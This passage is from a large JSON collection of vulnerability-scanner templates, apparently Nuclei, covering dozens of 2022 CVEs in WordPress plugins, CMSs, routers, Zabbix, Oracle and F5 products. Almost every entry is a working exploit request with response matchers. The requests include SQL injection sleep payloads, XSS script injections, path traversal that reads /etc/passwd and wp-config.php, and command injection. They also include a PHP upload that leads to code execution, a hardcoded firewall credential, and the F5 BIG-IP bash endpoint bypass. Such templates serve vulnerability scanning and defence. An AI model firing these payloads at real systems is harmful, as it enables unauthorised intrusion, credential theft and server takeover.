wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 15s\nGET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(header, 'wordpress_')","contains(header, 'Location')"],"condition":"and"}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST 